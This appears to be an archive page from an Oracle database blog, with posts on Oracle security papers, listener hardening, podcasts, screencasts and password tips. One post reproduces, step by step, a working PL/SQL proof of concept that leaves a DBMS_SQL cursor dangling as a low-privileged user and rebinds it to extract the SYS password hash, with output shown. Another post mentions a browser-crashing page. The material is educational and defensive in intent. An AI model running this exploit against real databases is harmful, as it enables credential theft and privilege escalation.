New Oracle Security Videos and Blog
Alexander Kornbrust of Red-Database-Security has started a new Oracle security blog (just added to OraNa.info). He also posted new Oracle security videos, 10 as of today.
Filed in Oracle, Security with Comments Off | Tags: Security5 Recent Oracle Security Related Documents
Oracle Applications 11i Encrypted Password String Disclosure (PDF): An undisclosed security vulnerability exists in Oracle Applications 11i that may allow an unauthenticated, internal attacker to obtain Oracle Applications’ user account encrypted password strings, which in turn can be decrypted using previously published information. An attacker can potentially obtain either any user’s password or the Oracle Applications’ main database account password (APPS).
Building an Audit Trail in an Oracle Applications Environment (PDF): Sarbanes-Oxley’s section 404 requires a company’s key systems be audited. However, many companies have “unauditable” systems and don’t even know it. This paper explores methods by which companies can create an auditable system by implementing various levels of audit trails in Oracle Applications.
Dissecting the Redo Logs (PDF): This paper delves into the guts of the undocumented binary format of the redo logs and shows the forensics examiner, if there is evidence to be found, how to find it and how it can be integrated into a time line of events. It also explores how an attacker can attempt to cover their tracks and how to spot this.
Locating dropped objects (PDF): This paper shows, even when an object has been dropped and purged from the system there will be, in the vast majority of cases, fragments left “lying around†which can be sewn together to build an accurate picture of what the actions the attacker took. Perhaps, depending upon how quickly an investigation takes place from the incident in question, even all data pertaining to the dropped object or objects may still be found.
Isolating Evidence of Attacks Against the Authentication Mechanism (PDF): This paper looks at attacks against the authentication mechanism and evidence to check whether a logon attempt was successful or not. It also looks at other attacks leveled at the authentication process including SID guessing, user enumeration and brute forcing of passwords over the network. Moreover, the paper looks at the differences between a logon attempt via the FTP and Web services provided with the XML Database and directly with the RDBMS itself.
Oracle Database Listener Security Guide
Integrigy has just published an updated version of the white paper on the Oracle database listener security.
From the introduction:
The Oracle Database Listener is the database server software component that manages the network traffic between the Oracle Database and the client. The Oracle Database Listener listens on a specific network port (default 1521) and forwards network connections to the Database. The Listener is comprised of two binaries: (1) tnslsnr which is the Listener itself and (2) the Listener Control Utility (lsnrctl) which is used to administer the Listener on the server or remotely.
Through our security assessments, Integrigy has consistently identified poor Oracle Database Listener security as a significant security risk. The majority of Oracle Database Listeners are not properly secured as recommended by Oracle and security experts. Fortunately in Oracle 10g, the default Listener configuration is much more secure.
The information contained in this paper is not new, is not obscure. It may not be well known to many Oracle DBAs, but is well known to security experts and hackers. This paper will outline the vulnerabilities in the Oracle Database Listener and provide recommendations for properly securing it. Providing minimal security for the Oracle Database Listener is simple and should be done for all Oracle installations – development, test and production.
Here is a link to the full document.
Filed in Oracle, Security with 2 Comments | Tags: SecurityIndirect Privilege Escalation And Defeating Virtual Private Databases
David Litchfield has just published two chapters from his book The Oracle Hacker’s Handbook: Hacking and Defending Oracle.
Indirect Privilege Escalation (PDF)
In this chapter, David gives two examples, one with CREATE ANY TRIGGER and another with CREATE ANY VIEW to demonstrate how these privileges can be abused to gain DBA privileges. In fact, a user who has the CREATE ANY x privilege can trivially gain DBA privileges, and SQL injection has a lot to do with it.
Defeating Virtual Private Databases (PDF)
Virtual Private Databases (VPDs) allow a user to access only the data that the policy specifies they can access, and no more. In this chapter, David demonstrates how to trick Oracle into dropping a policy and how to defeat VPDs with raw file access. Again, SQL injection is the main culprit.
Filed in Oracle, Tips with Comments Off | Tags: hack, Security, sql-injectionSee How To Hack Oracle Using Dangling Cursor Snarfing
David Litchfield published a paper demonstrating how an unclosed or dangling cursor created and used by DBMS_SQL can lead to a security hole.
I ran his proof of this vulnerability on my Oracle Database 10g Express Edition database.
Connected as SYS:
SQL> CREATE OR REPLACE PROCEDURE pwd_compare(p_user VARCHAR) IS
2 cursor_name INTEGER;
3 v_pwd VARCHAR2(30);
4 i INTEGER;
5 BEGIN
6
7 IF p_user != 'SYS' THEN
8 cursor_name := dbms_sql.open_cursor;
9 DBMS_OUTPUT.PUT_LINE('CURSOR: ' || cursor_name);
10 dbms_sql.parse(cursor_name,
11 'SELECT PASSWORD FROM SYS.DBA_USERS WHERE USERNAME = :u',
12 dbms_sql.native);
13 dbms_sql.bind_variable(cursor_name, ':u', p_user);
14 dbms_sql.define_column(cursor_name, 1, v_pwd, 30);
15 i := dbms_sql.EXECUTE(cursor_name);
16
17 IF dbms_sql.fetch_rows(cursor_name) > 0 THEN
18 dbms_sql.column_value(cursor_name, 1, v_pwd);
19 END IF;
20
21 IF v_pwd = '0123456789ABCDEF' THEN
22 DBMS_OUTPUT.PUT_LINE('Hmmm....');
23 END IF;
24
25 dbms_sql.close_cursor(cursor_name);
26 END IF;
27
28 END;
29 /
Procedure created.
SQL> GRANT EXECUTE ON pwd_compare TO PUBLIC;
Grant succeeded.
Note that, in the code above, there is no exception handling so if there is an error before the cursor is closed then the cursor will be left dangling.
Now, let’s connect as HR, a lower privileged user than SYS, and execute the procedure pwd_compare making sure we generate an exception in it:
SQL> DECLARE x VARCHAR(32000);
2 i INTEGER;
3 BEGIN
4 FOR i IN 1 .. 10000
5 LOOP
6 x := 'B' || x;
7 END LOOP;
8
9 sys.pwd_compare(x);
10 END;
11 /
CURSOR: 6
DECLARE x VARCHAR(32000);
*
ERROR at line 1:
ORA-01460: unimplemented or unreasonable conversion requested
ORA-06512: at "SYS.DBMS_SYS_SQL", line 1202
ORA-06512: at "SYS.DBMS_SQL", line 323
ORA-06512: at "SYS.PWD_COMPARE", line 15
ORA-06512: at line 9
What we have now is a dangling cursor with an ID number of 6. Armed with this piece of information we can rebind the username associated with the query, using SYS, then re-execute the query and extract the password hash for the SYS user bypassing the logic in the procedure pwd_compare:
SQL> DECLARE cursor_name INTEGER;
2 i INTEGER;
3 pwd VARCHAR2(30);
4 BEGIN
5 cursor_name := 6;
6 dbms_sql.bind_variable(cursor_name, ':u', 'SYS');
7 dbms_sql.define_column(cursor_name, 1, pwd, 30);
8 i := dbms_sql.EXECUTE(cursor_name);
9
10 IF dbms_sql.fetch_rows(cursor_name) > 0 THEN
11 dbms_sql.column_value(cursor_name, 1, pwd);
12 END IF;
13
14 dbms_sql.close_cursor(cursor_name);
15 DBMS_OUTPUT.PUT_LINE('PWD: ' || pwd);
16 END;
17 /
PWD: 586EEA79959C07B1
PL/SQL procedure successfully completed.
Interesting!
Lessons learned:
- Always perform extensive input validation.
- Always add exception handlers to your blocks.
- Always make sure to close your cursors.
Sources and resources:
- databasesecurity.com – Hacking Oracle
- SecurityFocus – BugTraq mailing list
- eWeek – Security Researcher: Beware Dangling Cursors in Oracle Code
A Couple of Podcasts About PL/SQL and Oracle Security
SearchOracle.com has just published a couple of interesting podcasts.
The first, titled Expert says PL/SQL change needed in Oracle 11g, is an interview with Steven Feuerstein.
In the interview, Steven answers the following questions:
- Considering how big OpenWorld has become, should there be a separate conference for PL/SQL developers?
- Your session at the conference was entitled “Ten things you should never do with PL/SQL.” What was number one?
- What do you think is the biggest problem or challenge that PL/SQL developers need to address?
- Users are very conditioned to accept bugs. Does this need to change?
- Can you tell us about your new free tool for testing code?
- What do you think are the biggest deficiencies in the PL/SQL language itself?
- You’ve written ten very well regarded books. What’s next?
The second podcast, titled Security expert sizes up Oracle patch policies, is an interview with Aaron Newman, author of “Oracle Security Handbook” and co-founder and chief technology officer of Application Security Inc.
In the interview, Aaron answers the following questions:
- Is Oracle OpenWorld getting too big to be useful?
- Can you explain the methodology behind what you call post-attack analytics?
- You argue that improper use of Oracle security products can erase the trail of an attacker. Could you elaborate on that?
- What do you think about the overall state of Oracle security these days?
- Is patching vulnerabilities a problem for Oracle?
- How does Oracle stack up against Microsoft and IBM in the area of patching?
- What does your firm offer in terms of security that Oracle does not?
- Will Oracle’s Fusion initiative be good or bad for Oracle security?
- What have you heard about the upcoming Oracle Database 11g?
- What are some of the pet peeves you have with Oracle DBAs when it comes to security?
links for 2006-10-06
-
Review of several types of SQL injection attacks and how they occur and what web developers and end users can do to prevent them.
-
This article will try to help beginners with grasping the problems facing them while trying to utilize SQL Injection techniques, to successfully utilize them, and to protect themselves from such attacks.
-
SQL Injection attacks are really nasty security vulnerabilities, and something all web developers need to make sure they understand and protect themselves against.
Screencasts: Cracking WEP, Tunneling Exploits and More
I stumbled upon this website which has the following interesting screencasts demonstrating the use of a penetration testing tool for Linux:
(IE may not display the screencasts correctly. Best viewed in Firefox)
It also has this interesting, and rather disturbing, animated GIF image:
click to see it in action
And finally, a web page that crashes your system, especially if you open it up in an outdated web browser:
_____ DO NOT CLICK HERE _____
If you are still curious about what that web page does, here is the HTML code (may still crash your system if using IE – open it at your own risk).
Here is what I think, in order to fully protect your system from all of these exploits and attacks you have got to learn all of these hacking techniques and tools. To outsmart “bad” hackers, you have to be a “good” hacker yourself.
Filed in Interesting Stuff, Technology with Comments Off | Tags: hack, SecurityOracle Security Podcast With Pete Finnigan
I have just finished listening to a very interesting podcast interview with Pete Finnigan (via SearchOracle.com). Pete discusses the problems with Oracle PL/SQL wrapping and hopes that Oracle releases all the built-in PL/SQL packages unwrapped as clear text, as in open source, so that everyone can help with finding bugs. Pete also advises DBAs to think like hackers in order to improve the security of the database.
Listen to the podcast.
Filed in Oracle, Security with 1 Comment | Tags: podcast, SecurityTop ten tips for better password management
There is an article on Silicon.com about how companies can manage their passwords. The author offers the following tips for fostering a culture of secure and more effective password management:
- Passwords must not be written down.
- Passwords must be set. When the password is “ChangeMe”, then change it.
- Require as few passwords as possible. Balance how much password protection you need with how many passwords can reasonably be managed.
- Staff must change their passwords regularly. This limits the likelihood of old passwords, shared between colleagues in less-secure times, coming back to haunt you.
- Make new passwords new. Old password = “Rowanda1″. New password = “Rowanda2″. Not good.
- Avoid obvious words. Passwords must be more complex than a single word which can be hacked with a dictionary attack.
- Think long – but not too long. A password which consists of at least eight characters with a mix of upper case, lower case and numbers is a good start.
- Automate password changes. The process of making staff reset and choose secure passwords must also be automated.
- Educate staff. Ensure password policy is written into employment contracts and that all staff understand why and what that entails.
- Look at long-term solutions which will eventually replace passwords – such as biometrics.
I believe that most of the above applies to individuals as well. In fact, tip number 10 is already a reality for the average consumer like you and me. Search Google for “biometric password manager” to see what I mean.
Personally, I have tens of passwords I need to keep track of. Since I avoid writing passwords down and it is impossible for me to remember them all, I rely primarily on my password manager software and sometimes on my memory when I am faced with “Please enter your user name and password”. Maybe I should try this new APC Biometric Password Manager, or something similar.
Filed in Security, Technology with 8 Comments | Tags: password, Security, software
